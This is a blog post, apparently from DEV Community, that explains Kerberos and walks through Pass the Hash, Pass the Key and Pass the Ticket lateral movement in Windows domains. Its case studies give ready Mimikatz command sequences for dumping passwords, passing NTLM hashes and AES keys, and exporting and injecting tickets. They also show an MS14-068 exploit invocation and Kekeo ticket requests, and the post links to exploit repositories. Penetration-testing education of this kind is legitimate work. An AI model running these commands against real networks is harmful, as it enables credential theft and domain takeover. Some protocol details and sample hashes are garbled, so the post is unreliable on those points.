DEV Community

Cover image for Domain Lateral Movement: PTH, PTK, and PTT Hash-Based Credential Transfer
Excalibra
Excalibra

Posted on

Domain Lateral Movement: PTH, PTK, and PTT Hash-Based Credential Transfer

#domain #cybersecurity #offensive #credential

Abstract: This article delineates the operational workflow of the Kerberos protocol within a domain environment, including the process by which a client obtains a Ticket-Granting Ticket (TGT) and its significance in intranet security. It critically examines three lateral movement techniques—Pass the Hash (PTH), Pass the Ticket (PTT), and Pass the Key (PTK)—and evaluates the ramifications of NTLM and LM Hash authentication on Windows systems. The discussion extends to the security patch KB2871997, designed to mitigate PTH attacks. Through case studies, the utilisation of the Mimikatz tool for credential extraction and injection is demonstrated, alongside an analysis of the MS14-068 vulnerability and the concepts of Golden and Silver Tickets. The practical application of the Ladon intranet penetration testing framework for information gathering and lateral movement is also considered.

The Kerberos Protocol Workflow

The Kerberos protocol operates within a domain context according to the following simplified procedure:

  • The client machine computes an NTLM hash of the user's plaintext password and encrypts it with a timestamp, utilising the krbtgt password hash as the key. This ciphertext is transmitted to the Key Distribution Centre (KDC), or domain controller. The KDC authenticates the user and subsequently generates a Ticket-Granting Ticket (TGT). The TGT's cryptographic signature is returned to the client; within the Kerberos framework, the TGT data can only be deciphered by the domain user krbtgt.
  • Subsequently, the client presents the TGT to the KDC to request a Ticket-Granting Service (TGS) ticket. The KDC validates the submitted TGT. Upon successful verification, it encrypts the target service account's NTLM hash and the TGT, returning the resultant ciphertext to the client.

The following definitions distinguish the three credential transfer techniques:

  • PTH (Pass the Hash): A penetration testing method conducted using the value of the LM or NTLM hash.
  • PTT (Pass the Ticket): A penetration test performed by utilising the TGT credentials.
  • PTK (Pass the Key): A penetration test executed using the ekeys AES256 hash (this key material can be obtained via the sekurlsa::ekeys command within Mimikatz).

On Authentication Hashes:
Windows operating systems utilise two primary hashing algorithms: LM Hash and NTLM Hash. For personal systems running Windows Vista or later, and server systems from Windows Server 2003 onwards, the standard authentication method is exclusively NTLM Hash.

A ticket may be conceptualised as analogous to a cookie deposited upon login to a website, or a persistent credential established between a computer and a remote entity. This ticket can subsequently be reused to re-establish a connection, functioning precisely like a session cookie. While PTH and PTK utilise identical connection protocols, PTT operates distinctly via the Kerberos protocol.

PTH Mechanism:
PTH constitutes a classic attack vector in intranet penetration. Its operational principle permits an attacker to remotely access a host or service by leveraging the LM Hash and NTLM Hash values, without necessitating the corresponding plaintext password. In essence, it suffices to acquire the encrypted hash value to mount an attack; the plaintext password is not required.

The attack landscape is nuanced. If NTLM authentication is disabled, the tool PsExec cannot establish a remote connection using the obtained NTLM hash; however, Mimikatz can still facilitate a successful attack. On specific operating systems—8.1/2012r2, and upon installation of Win 7/2008r2/8/2012 with patch KB2871997—AES keys may substitute for the NT hash to execute a PTK attack.

Summary: Impact of the KB2871997 Patch (systeminfo can verify patch installation)

  • PTH: On unpatched systems, any user can connect. Post-patch, only the built-in Administrator account connection is permitted.
  • PTK: The patch enables connections using the AES256 key for any user.
  • Refer to: Does KB2871997 truly defend against PTH attacks? - FreeBuf Cybersecurity Industry Portal

The Nature of PTT Attacks:
The PTT attack modality diverges from simple NTLM authentication. It is an attack leveraging the Kerberos protocol. Three prevalent attack methodologies are introduced here: the MS14-068 exploit, Golden Ticket, and Silver Ticket. Succinctly, these methods function by injecting a forged yet legitimate ticket into system memory to achieve a connection.

  • MS14-068 Vulnerability: An elevation of privilege vulnerability.
  • Golden Ticket & Silver Ticket: These are categorised as persistence and privilege maintenance techniques.
  • The MS14-068 vulnerability is hazardous because it enables any ordinary domain user to elevate their privileges to domain administrator. Microsoft's corrective patch is KB3011780.

Technique Summaries

  • Domain Lateral Movement via PTH Transfer - Mimikatz
  • Domain Lateral Movement via PTK Transfer - Mimikatz
  • Domain Lateral Movement via PTT Transfer - MS14-068 & Kekeo & Local Tickets
  • Domestic Ladon Intranet Penetration Framework Testing - Information Gathering, Connectivity, etc.

Case Study 1: Domain Lateral Movement via PTH Transfer - Mimikatz

This method, Pass the Hash, operates by discovering the password hash value (typically the NTLM hash) associated with an account. In a domain environment, where most computers are logged onto by domain users, a significant number of machines share an identical local administrator password set during installation. Consequently, if the local administrator credentials are uniform, an attacker can utilise a hash passing technique to log into other machines across the intranet. The critical advantage for the attacker is circumventing the computationally expensive and time-consuming process of cracking the password hash to reveal the plaintext.

Mimikatz serves as the instrumental tool for PTH, functioning not only as a credential harvester and plaintext password extractor but also as an attack platform.

PTH NTLM Transfer Commands:
For unpatched workgroup and domain connections:
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 (Assuming knowledge of the domain controller hash)
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad458a5695dc997aa02d455c (workgroup designates a local user connection)
sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad217334fe7

Target example: \OWA2010CN-God.god.org (Domain Controller)

Experimental Demonstration:
Execute the following sequence within an elevated PowerShell console on a 2008R2 x64 web server:

Command sequence:
privilege::debug
sekurlsa::logonPasswords (to extract plaintext passwords)
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 (Mimikatz will spawn a new command prompt window upon execution)
In the newly spawned window, execute: dir \\192.168.3.21\c$ (if the IP address is not resolvable, substitute the target's hostname)
Enter fullscreen mode Exit fullscreen mode

Case Study 2: Domain Lateral Movement via PTK Transfer - Mimikatz

This method utilises the AES256 key.

Commands for Patched Workgroup and Domain Connections:
sekurlsa::ekeys # retrieves the AES key material
sekurlsa::pth /user:mary /domain:god /aes256:d7c110753a2f7f240e5b2701dc1d16a16e40af3c5cdf814781c4b

Crucially, for a PTK attack to succeed for a non-administrator user, the target system must have the KB2871997 patch installed.

Case Study 3: Domain Lateral Movement via PTT Transfer - MS14-068 & Kekeo & Local Tickets

First Method: Exploiting the MS14-068 Vulnerability
This technique enables an ordinary domain user to directly obtain domain controller system privileges.

Procedure for MS14-068 via PowerShell:

  1. Ascertain the current Security Identifier (SID): whoami /user
  2. Credential Management: mimikatz # kerberos::purge // Purges all existing credentials on the current machine, as lingering domain member certificates can interfere with ticket forgery. mimikatz # kerberos::list // Inspect current machine certificates. mimikatz # kerberos::ptc <ticket_filename> // Inject a generated ticket into memory.
  3. Generate TGT Data via MS14-068: ms14-068.exe -u <DomainMember>@<domain> -s <sid> -d <domain_controller_address> -p <domain_member_password> Example: MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-21573346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45
  4. Inject the Forged Ticket into Memory: mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit
  5. Verify Credential Cache: klist (Displays current connections; use klist purge to delete tickets).
  6. Leverage the Access: dir \\192.168.3.21\c$ (or net use for connection; if IP fails, use the hostname).

The principle of this ticket passing attack lies in generating a syntactically correct connection request and importing it into memory via Mimikatz, thereby obviating the need for a password during the connection phase.

Second Method: Utilising the Kekeo Tool

  1. Generate the Ticket: kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a5dc997aa02d45c"
  2. Import the Ticket: kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
  3. Verify Credential Cache: klist
  4. Establish Connection: dir \\192.168.3.21\c$

Third Method: Exploiting Local Tickets (Requires Local Administrator Privileges)
This method essentially involves the harvesting and reuse of valid, pre-existing session cookies. The initial step is to use Mimikatz to export local tickets and subsequently import them into memory.

  • Command Sequence: sekurlsa::tickets /export kerberos::ptt xxxxxxxxx.xxx.kirbi (This action retrieves the previously stored "cookie" and tests its validity; credentials remain valid for a 10-hour window).

Summary: PTT delivery does not mandate local administrator privileges. Connections should be established using the hostname. The technique is predicated upon known vulnerabilities, dedicated tools, or the harvesting of locally cached tickets.

Case Study 4: The Ladon Intranet Penetration Framework - Testing and Validation

This section covers the practical application of Ladon for Information Gathering, Protocol Scanning, Vulnerability Probing, and Credential Passing Attacks.

Ladon functions as a large-scale intranet penetration scanner, often used in conjunction with Cobalt Strike. Ladon version 8.9 incorporates 120 built-in modules for tasks including information gathering, live host detection, port scanning, service identification, password spraying, vulnerability detection, and vulnerability exploitation. Vulnerability detection encompasses MS17-010 (EternalBlue), SMBGhost, WebLogic, ActiveMQ, Tomcat, and Struts2. Password spraying targets databases (MySQL, Oracle, MSSQL), remote access protocols (FTP, SSH for Linux, VNC), and Windows services (IPC, WMI, SMB, NetBIOS, LDAP, SmbHash, WmiHash, WinRM). Remote command execution supports multiple methods (smbexec, wmiexec, psexec, atexec, sshtexec) and exploitation frameworks (e.g., sshell, Webshell). Version X-4.0 and subsequent iterations are discussed.

  • Resources:
    • Ladon Repository: https://github.com/k8gege/Ladon
    • Kekeo Releases: https://github.com/gentilkiwi/kekeo/releases
    • MS14-068 Exploit: https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

Top comments (0)